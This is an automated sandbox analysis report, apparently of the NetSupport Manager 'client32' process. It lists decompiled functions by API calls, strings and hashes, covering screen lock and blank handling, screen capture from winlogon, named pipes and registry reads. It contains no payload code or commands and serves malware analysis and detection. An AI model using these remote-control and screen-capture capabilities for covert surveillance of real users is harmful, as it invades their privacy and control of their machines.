API ID: AddressProc$Library$Handle$ErrorFreeLast$CloseLoadModuleOpenProcessToken$InformationVersion_memset_strrchr
String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
API String ID: 3632244634-2591373181
Opcode ID: e7467b8ec444418c35d85a4cec7ffb325019a0e94ecb9dde698d2ee9a2182af1
Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
Opcode Fuzzy Hash: e7467b8ec444418c35d85a4cec7ffb325019a0e94ecb9dde698d2ee9a2182af1
Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51

Function 110F7AE0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 213windowlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,B6DE5DE1), ref: 110F7B16

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 110F7BBF
SetCursor.USER32(00000000,?,00000000,?,00000104), ref: 110F7C6E
ShowCursor.USER32(00000000,?,00000104), ref: 110F7C7B
OpenEventA.KERNEL32(00100000,00000000,NSLockExit,?,00000104), ref: 110F7C8C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000001F4,000000BF), ref: 110F7CBA
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7CCF
TranslateMessage.USER32(?), ref: 110F7CE0
DispatchMessageA.USER32(?), ref: 110F7CED
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000001F4,000000BF), ref: 110F7D07
CloseHandle.KERNEL32(?,?,00000104), ref: 110F7D14

Part of subcall function 111466B0: LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
Part of subcall function 111466B0: GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
Part of subcall function 111466B0: FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7D2C
TranslateMessage.USER32(?), ref: 110F7D47
DispatchMessageA.USER32(?), ref: 110F7D50
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7D60
ShowCursor.USER32(00000001,?,00000104), ref: 110F7D6E
SetCursor.USER32(?,?,00000104), ref: 110F7D7B
FreeLibrary.KERNEL32(00000000,0000004C,?,00000104), ref: 110F7DA0

Strings

NSLockExit, xrefs: 110F7C81
SetProcessDPIAware, xrefs: 110F7BB9
User32.dll, xrefs: 110F7B11

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CursorLibrary$AddressDispatchFreeLoadMultipleObjectsOpenProcShowTranslateWait$CloseEventHandleVersion_memset_strncpy
String ID: NSLockExit$SetProcessDPIAware$User32.dll
API String ID: 2007862282-1780497338
Opcode ID: 1b68a177fe7e3adb4be151d2c28160f84694fbeb9673fd959072614c21047b21
Instruction ID: b9e1d9161537ff9787c7dbda9af044ef35c33ebaceacb8da5b443061ba7302c4
Opcode Fuzzy Hash: 1b68a177fe7e3adb4be151d2c28160f84694fbeb9673fd959072614c21047b21
Instruction Fuzzy Hash: 568192B1D4062DABDB15DFA58DC5BEDFBB8AB48708F4004EAE519E7240EB305A80CF51

Function 110EF8E0 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 110EF8FE
GetStockObject.GDI32(0000000F), ref: 110EF912
GetDC.USER32(00000000), ref: 110EF98A
SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF99B
RealizePalette.GDI32(00000000), ref: 110EF9A1
GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF9BC
SelectPalette.GDI32(00000000,?,00000001), ref: 110EF9D0
RealizePalette.GDI32(00000000), ref: 110EF9D3
ReleaseDC.USER32(00000000,00000000), ref: 110EF9DB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
String ID:
API String ID: 1969595663-0
Opcode ID: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
Instruction ID: e17b5be7c9f279923d338761c599270f53c35d08167a1dd70bb196578b399fb7
Opcode Fuzzy Hash: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
Instruction Fuzzy Hash: 3471B2B2E41228AFDB04CFE5CC88BEEB7B9FF48705F044129F515E7244D674A9408BA1

Function 11009D40 Relevance: 35.3, APIs: 10, Strings: 10, Instructions: 294COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11009D88
wsprintfA.USER32 ref: 11009DD7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_malloc.LIBCMT ref: 11009E00
wsprintfA.USER32 ref: 11009E5B
wsprintfA.USER32 ref: 11009E9E
wsprintfA.USER32 ref: 11009EE7
_malloc.LIBCMT ref: 11009F3D
_malloc.LIBCMT ref: 11009FDB
_memmove.LIBCMT ref: 1100A00F
_free.LIBCMT ref: 1100A09E

Strings

acmStreamConvert err=%d, has=%x, xrefs: 11009E98
acmStreamSize err=%d, has=%x, xrefs: 11009DD1
ash.pbDst, xrefs: 11009E22
acmStreamUnprepareHeader err=%d, has=%x, xrefs: 11009EE1
Error. cvt buf overflow1, xrefs: 1100A08A
T, xrefs: 11009DA7
acmStreamPrepareHeader err=%d, has=%x, cb=%d, pb=%x, xrefs: 11009E55
Adjusting inexact audio conversion from %d to %d (%d b/smp), xrefs: 11009F2C
..\ctl32\AUDIO.CPP, xrefs: 11009DE8, 11009E1D, 11009E6C, 11009EAF, 11009EF8, 11009FF4
buf, xrefs: 11009FF9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$_malloc$ErrorExitLastMessageProcess_free_memmove_memset
String ID: ..\ctl32\AUDIO.CPP$Adjusting inexact audio conversion from %d to %d (%d b/smp)$Error. cvt buf overflow1$T$acmStreamConvert err=%d, has=%x$acmStreamPrepareHeader err=%d, has=%x, cb=%d, pb=%x$acmStreamSize err=%d, has=%x$acmStreamUnprepareHeader err=%d, has=%x$ash.pbDst$buf
API String ID: 2043724877-637051552
Opcode ID: e7833eef87c03b3e2560ae7f940d8286f303a65c822d730f1202cb3e57f9bedd
Instruction ID: 2dda31bb0dc803fa1b5a7e28541bdb757bf9e89acd00cb7efcc08ab63fc84fe4
Opcode Fuzzy Hash: e7833eef87c03b3e2560ae7f940d8286f303a65c822d730f1202cb3e57f9bedd
Instruction Fuzzy Hash: B1A1A675E001299BDB14CF65CC81FEEB7B5AF89344F0442E9E54DA7241EA31AE94CFA0

Function 110F7DD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 206windowlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,B6DE5DE1), ref: 110F7E06

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 110F7EAF
ShowCursor.USER32(00000000,?,00000200), ref: 110F7F60
OpenEventA.KERNEL32(00100000,00000000,NSBlankExit,?,00000200), ref: 110F7F71
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000001F4,000000BF), ref: 110F7F9B
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7FB0
TranslateMessage.USER32(?), ref: 110F7FC1
DispatchMessageA.USER32(?), ref: 110F7FCE
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000001F4,000000BF), ref: 110F7FE8
CloseHandle.KERNEL32(?,?,00000200), ref: 110F7FF5
ShowCursor.USER32(00000001,?,00000200), ref: 110F804E

Part of subcall function 111466B0: LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
Part of subcall function 111466B0: GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
Part of subcall function 111466B0: FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F800D
TranslateMessage.USER32(?), ref: 110F8027
DispatchMessageA.USER32(?), ref: 110F8030
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F8040
FreeLibrary.KERNEL32(00000000,00000042,?,00000200), ref: 110F8073

Strings

SetProcessDPIAware, xrefs: 110F7EA9
NSBlankExit, xrefs: 110F7F66
User32.dll, xrefs: 110F7E01

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Library$AddressCursorDispatchFreeLoadMultipleObjectsOpenProcShowTranslateWait$CloseEventHandleVersion_memset_strncpy
String ID: NSBlankExit$SetProcessDPIAware$User32.dll
API String ID: 1753590566-3840961702
Opcode ID: 120d6b86ea30c8080c32122c209e90dc263803829c7c725c0775d1d48ae1e1df
Instruction ID: bcd76d215e0a131918d67ffc87e84afec0085acf7c65c5ceef9aeb818b4fae96
Opcode Fuzzy Hash: 120d6b86ea30c8080c32122c209e90dc263803829c7c725c0775d1d48ae1e1df
Instruction Fuzzy Hash: 377171B1D4122EABDB10DFA48DC9BADFAB8BB48708F1004AAE519E7140EB745A448F51

Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
GetDC.USER32(00000000), ref: 1105D2BB
CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
SelectObject.GDI32(00000000,00000000), ref: 1105D300
GetTickCount.KERNEL32 ref: 1105D30F
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
GetTickCount.KERNEL32 ref: 1105D33C
GetLastError.KERNEL32(?), ref: 1105D348
GdiFlush.GDI32 ref: 1105D35C
SelectObject.GDI32(00000000,?), ref: 1105D367
DeleteObject.GDI32(00000000), ref: 1105D36E
DeleteDC.GDI32(00000000), ref: 1105D378
ReleaseDC.USER32(00000000,00000000), ref: 1105D384
UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
CloseHandle.KERNEL32(00000000), ref: 1105D396

Strings

/thumb:, xrefs: 1105D255
ThumbWL, xrefs: 1105D246
Error %d blitting from winlogon, took %d ms, xrefs: 1105D34F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
API String ID: 652520247-4094952007
Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1

Function 11139A70 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

PostMessageA.USER32(00000000,000006CF,00000007,00000000), ref: 11139C4F

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SetWindowTextA.USER32(00000000,00000000), ref: 11139CF7
IsWindowVisible.USER32(00000000), ref: 11139DBC
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
IsWindowVisible.USER32(00000000), ref: 11139DEA
SetForegroundWindow.USER32(00000000), ref: 11139E18
EnableWindow.USER32(00000000,00000001), ref: 11139E27
IsWindowVisible.USER32(00000000), ref: 11139E78
IsWindowVisible.USER32(00000000), ref: 11139E85
EnableWindow.USER32(00000000,00000000), ref: 11139E99
EnableWindow.USER32(00000000,00000000), ref: 11139DFF

Part of subcall function 11132120: ShowWindow.USER32(00000000,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144

EnableWindow.USER32(00000000,00000001), ref: 11139EAD

Strings

HideWhenIdle, xrefs: 11139AEC
ViewedText, xrefs: 11139B7B
ConnectedText, xrefs: 11139B88, 11139B97
Client, xrefs: 11139AF1, 11139B9B, 11139BD4, 11139C32
ShowUIOnConnect, xrefs: 11139C2D
8zi, xrefs: 11139D9C, 11139E5D
LockedText, xrefs: 11139BCF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: 8zi$Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-1465004368
Opcode ID: 69fda38d69e5d8470935704611ee3baff07f37079ec3bdfa8b386311237e0b95
Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
Opcode Fuzzy Hash: 69fda38d69e5d8470935704611ee3baff07f37079ec3bdfa8b386311237e0b95
Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A

Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB

wsprintfA.USER32 ref: 1102B84D

Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926

FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
wsprintfA.USER32 ref: 1102B69E
wsprintfA.USER32 ref: 1102B705

Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053

Strings

Warning. DSReg e=%d, e2=%d, xrefs: 1102B7EE
Accel=restored, xrefs: 1102B7DD
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B8AC, 1102B8C0
%02d/%02d/%02d %02d:%02d:%02d.%03d, xrefs: 1102B698
accel=%d, wdm=%d, key=%s, mix=%s, dev=%s, xrefs: 1102B72B
%s\%s, xrefs: 1102B6FF, 1102B847
set %s=15, e=%d, xrefs: 1102B796
Software\NSL\Saved\DS, xrefs: 1102B75E, 1102B7BB
WDM, xrefs: 1102B6D7
DirectSound\Mixer Defaults, xrefs: 1102B5B7, 1102B6F3
IsA(), xrefs: 1102B8B1, 1102B8C5
DirectSound, xrefs: 1102B58B
Error. Can't open %s, xrefs: 1102B8D0
DirectSound\Device Presence, xrefs: 1102B5E4
Acceleration, xrefs: 1102B6BA, 1102B763, 1102B77E, 1102B791, 1102B7C0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
API String ID: 2153351953-120756110
Opcode ID: ad3ff848d699aaf35aab482072cc20af77f509633a7c4eec351ae235d577d6b0
Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
Opcode Fuzzy Hash: ad3ff848d699aaf35aab482072cc20af77f509633a7c4eec351ae235d577d6b0
Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61

Function 110F5DA0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179filesleeppipeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110F5DD8

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000), ref: 111100F4

wsprintfA.USER32 ref: 110F5E2A

Part of subcall function 110F37A0: LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
Part of subcall function 110F37A0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
Part of subcall function 110F37A0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
Part of subcall function 110F37A0: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
Part of subcall function 110F37A0: GetLastError.KERNEL32 ref: 110F3820
Part of subcall function 110F37A0: Sleep.KERNEL32(000003E8), ref: 110F383F
Part of subcall function 110F37A0: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
Part of subcall function 110F37A0: LocalFree.KERNEL32(?), ref: 110F386F

wsprintfA.USER32 ref: 110F5E6E
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 110F5E9A
Sleep.KERNEL32(000003E8), ref: 110F5EAC
SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000), ref: 110F5EC9
ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 110F5F33
CloseHandle.KERNEL32(00000000), ref: 110F5F6E
GetLastError.KERNEL32 ref: 110F5F7C
InterlockedExchange.KERNEL32(?,00000000), ref: 110F5F88
CloseHandle.KERNEL32(00000000), ref: 110F5F93
SetEvent.KERNEL32(00000264), ref: 110F5FAA
InterlockedExchange.KERNEL32(?,00000000), ref: 110F5FBC
CloseHandle.KERNEL32(00000000), ref: 110F5FC3
InterlockedExchange.KERNEL32(?,00000000), ref: 110F5FCF
CloseHandle.KERNEL32(00000000), ref: 110F5FD9

Strings

VistaUIPipe%d, xrefs: 110F5DC6
